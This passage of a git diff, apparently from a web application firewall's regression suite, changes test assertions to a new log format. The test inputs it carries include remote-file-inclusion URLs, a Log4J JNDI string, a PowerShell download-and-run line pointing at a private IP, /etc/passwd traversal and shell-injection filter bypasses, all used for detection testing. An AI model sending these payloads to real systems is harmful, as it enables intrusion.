index 8b0a1c6f3..79f562df5 100644
--- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml
+++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml
@@ -18,7 +18,8 @@ tests: uri: "/get/sys/class" version: "HTTP/1.1" output: - log_contains: id "930130" + log: + expect_ids: [930130] - test_id: 2 desc: "LFI via URI: /proc" stages:
@@ -33,4 +34,5 @@ tests: uri: "/get/proc/interrupts" version: "HTTP/1.1" output: - log_contains: id "930130" + log: + expect_ids: [930130]
diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml
index 368dd5005..ca85a2736 100644
--- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml
+++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml
@@ -22,4 +22,5 @@ tests: uri: "/get/wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php" version: "HTTP/1.1" output: - log_contains: id "931100" + log: + expect_ids: [931100]
diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml
index d5983803d..37f4e627c 100644
--- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml
+++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml
@@ -22,7 +22,8 @@ tests: uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" version: "HTTP/1.1" output: - log_contains: id "931110" + log: + expect_ids: [931110] - test_id: 2 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages:
@@ -42,7 +43,8 @@ tests: uri: "/get/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar" version: "HTTP/1.1" output: - log_contains: id "931110" + log: + expect_ids: [931110] - test_id: 3 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages:
@@ -62,4 +64,5 @@ tests: uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" version: "HTTP/1.1" output: - log_contains: id "931110" + log: + expect_ids: [931110]
diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml
index 5a4050483..0b95fd320 100644
--- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml
+++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml
@@ -17,7 +17,8 @@ tests: uri: "/get?x=file?" version: HTTP/1.1 output: - log_contains: id "931120" + log: + expect_ids: [931120] - test_id: 2 desc: Remote File Inclusion Attack (931120) stages:
@@ -32,7 +33,8 @@ tests: uri: "/get?x=ftp?" version: HTTP/1.1 output: - log_contains: id "931120" + log: + expect_ids: [931120] - test_id: 3 desc: Remote File Inclusion Attack (931120) stages:
@@ -47,7 +49,8 @@ tests: uri: "/get?x=ftps?" version: HTTP/1.1 output: - log_contains: id "931120" + log: + expect_ids: [931120] - test_id: 4 desc: Remote File Inclusion Attack (931120) stages:
@@ -62,7 +65,8 @@ tests: uri: "/get?x=http?" version: HTTP/1.1 output: - log_contains: id "931120" + log: + expect_ids: [931120] - test_id: 5 desc: Remote File Inclusion Attack (931120) stages:
@@ -77,7 +81,8 @@ tests: uri: "/get?x=https?" version: HTTP/1.1 output: - log_contains: id "931120" + log: + expect_ids: [931120] - test_id: 6 desc: Remote File Inclusion Attack (931120) stages:
@@ -92,7 +97,8 @@ tests: uri: "/get?x=https://foo.bar?" version: HTTP/1.1 output: - log_contains: id "931120" + log: + expect_ids: [931120] - test_id: 7 desc: Remote File Inclusion Attack (931120) stages:
@@ -107,7 +113,8 @@ tests: uri: "/get?x=https://foo.bar?foo=bar" version: HTTP/1.1 output: - no_log_contains: id "931120" + log: + no_expect_ids: [931120] - test_id: 8 desc: Remote File Inclusion Attack (931120) stages:
@@ -122,4 +129,5 @@ tests: uri: "/get?x=https://foo.bar&foo=bar" version: HTTP/1.1 output: - no_log_contains: id "931120" + log: + no_expect_ids: [931120]
diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml
index 56524bf51..19e752d02 100644
--- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml
+++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml
@@ -17,7 +17,8 @@ tests: uri: "/get?x=file://foo.bar" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 2 desc: Remote File Inclusion Attack (931130) stages:
@@ -32,7 +33,8 @@ tests: uri: "/get?x=ftp://foo.bar" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 3 desc: Remote File Inclusion Attack (931130) stages:
@@ -47,7 +49,8 @@ tests: uri: "/get?x=ftps://foo.bar" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 4 desc: Remote File Inclusion Attack (931130) stages:
@@ -62,7 +65,8 @@ tests: uri: "/get?x=http://foo.bar" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 5 desc: Remote File Inclusion Attack (931130) stages:
@@ -77,7 +81,8 @@ tests: uri: "/get?x=https://foo.bar" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 6 desc: Partial match stages:
@@ -92,7 +97,8 @@ tests: uri: "/get?x=https://evilexample.com/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 7 desc: Mismatching domains stages:
@@ -107,7 +113,8 @@ tests: uri: "/get?x=https://example.com.evil.com/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 8 desc: Mismatching ports stages:
@@ -122,7 +129,8 @@ tests: uri: "/get?x=https://example.com:1234/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 9 desc: Matching hosts stages:
@@ -137,7 +145,8 @@ tests: uri: "/get?x=https://example.com/" version: HTTP/1.1 output: - no_log_contains: id "931130" + log: + no_expect_ids: [931130] - test_id: 10 desc: Matching hosts and ports stages:
@@ -152,7 +161,8 @@ tests: uri: "/get?x=https://example.com:1234/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 11 desc: Subdomains stages:
@@ -167,7 +177,8 @@ tests: uri: "/get?x=http://www.example.com/some/path" version: HTTP/1.1 output: - no_log_contains: id "931130" + log: + no_expect_ids: [931130] - test_id: 12 desc: Bypass 1 stages:
@@ -182,7 +193,8 @@ tests: uri: "/get?x=http://example.com%2f:asd@evil.com/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 13 desc: Bypass 2 stages:
@@ -197,7 +209,8 @@ tests: uri: "/get?x=http://example.com%2f@evil.com/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 14 desc: Bypass 3 stages:
@@ -212,7 +225,8 @@ tests: uri: "/get?x=http://example.com%2f:foo@bar@evil.com/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 15 desc: basic auth stages:
@@ -227,7 +241,8 @@ tests: uri: "/get?x=http://foo:bar@example.com/" version: HTTP/1.1 output: - no_log_contains: id "931130" + log: + no_expect_ids: [931130] - test_id: 16 desc: "Positive test: Remote File Inclusion Attack (931130) - Detect url:file://" stages:
@@ -242,7 +257,8 @@ tests: uri: "/get?x=url:file://foo.bar" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 17 desc: Remote File Inclusion Attack (931130) - Detect gopher:// stages:
@@ -257,7 +273,8 @@ tests: uri: "/get?x=gopher://google.com/_SSRFTest!" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 18 desc: Remote File Inclusion Attack (931130) - Ldap Protocol stages:
@@ -272,7 +289,8 @@ tests: uri: "/get?x=ldap://127.0.0.1/" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 19 desc: Remote File Inclusion Attack (931130) stages:
@@ -287,7 +305,8 @@ tests: uri: "/get?x=jar:http://evil.co/b.zip!a" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 20 desc: Remote File Inclusion Attack (931130) with Java backend stages:
@@ -302,7 +321,8 @@ tests: uri: "/get?x=url:file://etc/services" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 21 desc: Remote File Inclusion Attack (931130) with local_file url scheme stages:
@@ -317,7 +337,8 @@ tests: uri: "/get?x=local_file://something" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130] - test_id: 22 desc: Remote File Inclusion Attack (931130) with Java backend and trailing / stages:
@@ -332,4 +353,5 @@ tests: uri: "/get?x=url:file:///etc/passwd" version: HTTP/1.1 output: - log_contains: id "931130" + log: + expect_ids: [931130]
diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml
index 1685c4137..b57d42210 100644
--- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml
+++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml
@@ -17,4 +17,5 @@ tests: uri: "/get/file:%2f%2f/usr/src/blog/app/assets/javascripts/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd" version: HTTP/1.1 output: - log_contains: id "931131" + log: + expect_ids: [931131]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml
index c7b1c1167..4e4f74a71 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932120.yaml
@@ -17,7 +17,8 @@ tests: uri: "/get?932120-1=Invoke-WebRequest%20http://example.com/path/file.ps1" version: "HTTP/1.1" output: - log_contains: "id \"932120\"" + log: + expect_ids: [932120] - test_id: 2 stages: - input:
@@ -32,7 +33,8 @@ tests: data: '932120-2=Invoke-WebRequest http://example.com/path/file.ps1' version: "HTTP/1.1" output: - log_contains: "id \"932120\"" + log: + expect_ids: [932120] - test_id: 3 stages: - input: @@ -47,7 +49,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: "id \"932120\"" + log: + expect_ids: [932120] - test_id: 4 stages: - input: @@ -62,7 +65,8 @@ tests: data: '932120-4=Invoke Web Request http://example.com/path/file.ps1' version: "HTTP/1.1" output: - no_log_contains: "id \"932120\"" + log: + no_expect_ids: [932120] - test_id: 5 desc: "Test for BB GU2FIXLC - powershell" stages: @@ -78,4 +82,5 @@ tests: data: 'cmd=powershell%20C%3A%5Cwindows%5Csystem32%5Cnotepad.exe' version: "HTTP/1.1" output: - log_contains: id "932120" + log: + expect_ids: [932120] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml index efd4198ee..db6723858 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932125.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?cmd=%3Biwr%20http://example.com/path/file.ps1" version: "HTTP/1.1" output: - log_contains: id "932125" + log: + expect_ids: [932125] - test_id: 2 desc: "Test for BB finding VYYFBP5V" stages: @@ -32,7 +33,8 @@ tests: uri: "/get?cmd=%3Biwmi%20-class%20Win32_process%20-name%20Create%20-ArgumentList%20cmd" version: "HTTP/1.1" output: - log_contains: id "932125" + log: + expect_ids: [932125] - test_id: 3 desc: "Test for BB finding VYYFBP5V" stages: @@ -48,4 +50,5 @@ tests: data: cmd=;iex (iwr http://10.0.10.10:8000/x.ps1) version: "HTTP/1.1" output: - log_contains: id "932125" + log: + expect_ids: [932125] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml index 6cce5b313..6c38dc749 100755 
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml @@ -17,7 +17,8 @@ tests: uri: "/get?932130-1=$(cmd)" version: "HTTP/1.1" output: - log_contains: 'id "932130"' + log: + expect_ids: [932130] - test_id: 2 stages: - input: @@ -32,7 +33,8 @@ tests: data: "932130-2=${cmd}" version: "HTTP/1.1" output: - log_contains: 'id "932130"' + log: + expect_ids: [932130] - test_id: 3 stages: - input: @@ -47,7 +49,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: 'id "932130"' + log: + expect_ids: [932130] - test_id: 4 stages: - input: @@ -62,7 +65,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: 'id "932130"' + log: + expect_ids: [932130] - test_id: 5 stages: - input: @@ -77,7 +81,8 @@ tests: data: "932130-5=Some text (in brackets)." version: "HTTP/1.1" output: - no_log_contains: 'id "932130"' + log: + no_expect_ids: [932130] - test_id: 6 desc: "Log4J exploit picked up by shell exploit detection in body" stages: @@ -94,7 +99,8 @@ tests: data: '{"foo": "${:1337:-x$}{jndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: - log_contains: 'id "932130"' + log: + expect_ids: [932130] - test_id: 7 desc: "Unix command injection" stages: @@ -110,7 +116,8 @@ tests: data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 8 desc: "Unix command injection - character set bypass technique" stages: @@ -126,7 +133,8 @@ tests: uri: "/get?cmd=cat%20/etc/pa%5Bs%5Dswd" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 9 desc: "Unix command injection - character set bypass technique" stages: 
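Review bot: The index line for 932130.yaml at the end of the previous line shows mode 100755, so this fixture carries the executable bit while the neighbouring test files are 100644, and the commit rewrites the file without touching the mode. A YAML test-data file has no reason to be executable, and the stray bit is the kind of thing permission linters and packaging checks flag later. Since the file is already being edited, clearing it with `git update-index --chmod=-x tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932130.yaml` in the same commit would keep the mode consistent across the directory.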
@@ -142,7 +150,8 @@ tests: uri: "/get?cmd=cat%20/%5B%3F%5Dtc/pa%5B%3F%5Dswd" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 10 desc: "Unix command injection - character set bypass - negative test" stages: @@ -158,7 +167,8 @@ tests: uri: "/get?cmd=hello%20%5Btext%20in%20brackets%5D" version: HTTP/1.0 output: - no_log_contains: id "932130" + log: + no_expect_ids: [932130] - test_id: 11 desc: "Unix command injection - bracket bypass" stages: @@ -173,7 +183,8 @@ tests: uri: "/get?s=/etc/pas[s]wd" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 12 desc: "Unix command injection - bracket bypass" stages: @@ -188,7 +199,8 @@ tests: uri: "/get?s=/etc/%5Bp%5Dasswd" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 13 desc: "Unix command injection - bracket bypass" stages: @@ -203,7 +215,8 @@ tests: uri: "/get?s=/etc/%5B!q%5Dasswd" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 14 desc: "Unix command injection - bracket bypass" stages: @@ -218,7 +231,8 @@ tests: uri: "/get?s=/etc/%5Bm-z%5Dasswd" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 15 desc: "Unix command injection - bracket bypass" stages: @@ -233,7 +247,8 @@ tests: uri: "/get?s=/usr/bin/%5Bu%5Dname+-a" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] - test_id: 16 desc: "Unix command injection - bracket bypass" stages: @@ -248,4 +263,5 @@ tests: uri: "/get?exec=/bi%5Bn%5D/bash" version: HTTP/1.0 output: - log_contains: id "932130" + log: + expect_ids: [932130] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml index 155462cee..e7e479eb2 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml 
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932131.yaml @@ -18,7 +18,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "932131" + log: + expect_ids: [932131] - test_id: 2 desc: False positive against Facebook for Android user agent stages: @@ -33,4 +34,5 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "932131" + log: + no_expect_ids: [932131] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml index b7dff9301..e38f63c71 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932140.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?foo=for%20%25variable%20in%20%28set%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 2 desc: for %% stages: @@ -33,7 +34,8 @@ tests: uri: "/get?foo=for%20%25%25variable%20in%20%28set%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 3 desc: for /d stages: @@ -48,7 +50,8 @@ tests: uri: "/get?foo=for%20%2fd%20%25variable%20in%20%28set%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 4 desc: for /r stages: @@ -63,7 +66,8 @@ tests: uri: "/get?foo=for%20%2fr%20c%3a%5c%20%25variable%20in%20%28set%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 5 desc: for /l stages: @@ -78,7 +82,8 @@ tests: uri: "/get?foo=for%20%2fl%20%25variable%20in%20%281%2c1%2c2%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 6 desc: for /f .. fileset stages: 
@@ -93,7 +98,8 @@ tests: uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28fileset%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 7 desc: for /f .. "string" stages: @@ -108,7 +114,8 @@ tests: uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%22string%22%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 8 desc: for /f .. 'command' stages: @@ -123,7 +130,8 @@ tests: uri: "/get?foo=for%20%2ff%20%25variable%20in%20%28%27command%27%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 9 desc: for /f .. `command` stages: @@ -138,7 +146,8 @@ tests: uri: "/get?foo=for%20%2ff%20%22usebackq%22%20%25variable%20in%20%28%60command%60%29%20do%20command" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 10 desc: imported test stages: @@ -153,7 +162,8 @@ tests: uri: "/get?foo=%7Cfor+%2Ff+%22delims%3D%22+%25i+in+%28%27cmd+%2Fc+%22powershell.exe+-InputFormat+none+write+%27FJQPVY%27.length%22%27%29+do+if+%25i%3D%3D6+%28cmd+%2Fc+%22powershell.exe+-InputFormat+none+Start-Sleep+-s+2%22%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 11 desc: imported test stages: @@ -168,7 +178,8 @@ tests: uri: "/get?foo=FOR++++++++++++++%25a+IN+%28set%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 12 desc: imported test stages: @@ -183,7 +194,8 @@ tests: uri: "/get?foo=FOR+%2FD+++++++++++%25a+IN+%28dirs%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 13 desc: imported test stages: @@ -198,7 +210,8 @@ tests: uri: "/get?foo=FOR+%2FD+%2FD++++++++%25a+IN+%28dirs%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 14 desc: imported test stages: 
@@ -213,7 +226,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28text%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 15 desc: imported test stages: @@ -228,7 +242,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28%22text%22%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 16 desc: imported test stages: @@ -243,7 +258,8 @@ tests: uri: "/get?foo=FOR+%2FL+++++++++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 17 desc: imported test stages: @@ -258,7 +274,8 @@ tests: uri: "/get?foo=FOR+%2FL+%2FL+%2FL+++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 18 desc: imported test stages: @@ -273,7 +290,8 @@ tests: uri: "/get?foo=FOR+%2FR+C%3A%5Cbla++++%25A+IN+%28set%29+DO+abc" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 19 desc: imported test stages: @@ -288,7 +306,8 @@ tests: uri: "/get?foo=%26+for+%25a+in+%28a%2Cb%2Cc%29+do+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 20 desc: imported test stages: @@ -303,7 +322,8 @@ tests: uri: "/get?foo=%26+FOR+%25%25a+IN+%28a%2Cb%2Cc%29+DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 21 desc: imported test stages: @@ -318,7 +338,8 @@ tests: uri: "/get?foo=%26+FOR+%25_+IN+%28a%2Cb%2Cc%29+DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 22 desc: imported test stages: @@ -333,7 +354,8 @@ tests: uri: "/get?foo=%26+FOR+%252+IN+%28a%2Cb%2Cc%29+DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 23 desc: imported test stages: 
@@ -348,7 +370,8 @@ tests: uri: "/get?foo=%26+FOR+%25-+IN+%28a%2Cb%2Cc%29+DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 24 desc: imported test stages: @@ -363,7 +386,8 @@ tests: uri: "/get?foo=%26+FOR+%25%2F+IN+%28a%2Cb%2Cc%29+DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 25 desc: imported test stages: @@ -378,7 +402,8 @@ tests: uri: "/get?foo=%26+FOR+%25%40+IN+%28a%2Cb%2Cc%29DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 26 desc: imported test stages: @@ -393,7 +418,8 @@ tests: uri: "/get?foo=%26+FOR+%25%5B+IN+%28a%2Cb%2Cc%29DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 27 desc: imported test stages: @@ -408,7 +434,8 @@ tests: uri: "/get?foo=%26+FOR+%25%5D+IN+%28a%2Cb%2Cc%29DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 28 desc: imported test stages: @@ -423,7 +450,8 @@ tests: uri: "/get?foo=%26+FOR+%25%7E+IN+%28a%2Cb%2Cc%29DO+cmd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 29 desc: imported test stages: @@ -438,7 +466,8 @@ tests: uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25A+IN+%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 30 desc: imported test stages: @@ -453,7 +482,8 @@ tests: uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25%25A+IN+++%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 31 desc: imported test stages: @@ -468,7 +498,8 @@ tests: uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+%28%27SET%27%29+DO+%40Echo+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 32 desc: imported test stages: 
@@ -483,7 +514,8 @@ tests: uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 33 desc: imported test stages: @@ -498,7 +530,8 @@ tests: uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25%7E+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 34 desc: imported test stages: @@ -513,7 +546,8 @@ tests: uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25G%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 35 desc: imported test stages: @@ -528,7 +562,8 @@ tests: uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25%25G%22" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 36 desc: imported test stages: @@ -543,7 +578,8 @@ tests: uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25G%22%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 37 desc: imported test stages: @@ -558,7 +594,8 @@ tests: uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25%25G%22%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 38 desc: imported test stages: @@ -573,7 +610,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25A+%25B+%25D" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 39 desc: imported test stages: 
@@ -588,7 +626,8 @@ tests: uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25%25A+%25%25B+%25%25D" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 40 desc: imported test stages: @@ -603,7 +642,8 @@ tests: uri: "/get?foo=FOR+%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25G%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 41 desc: imported test stages: @@ -618,7 +658,8 @@ tests: uri: "/get?foo=FOR+%25%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25%25G%29" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 42 desc: imported test stages: @@ -633,7 +674,8 @@ tests: uri: "/get?foo=FOR+%2FL+%25G+IN+%281%2C1%2C5%29+DO+echo+%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 43 desc: imported test stages: @@ -648,7 +690,8 @@ tests: uri: "/get?foo=FOR+%2FL+%25%25G+IN+%281%2C1%2C5%29+DO+echo+%25%25G" version: HTTP/1.0 output: - log_contains: id "932140" + log: + expect_ids: [932140] - test_id: 44 desc: imported test stages: @@ -663,7 +706,8 @@ tests: uri: 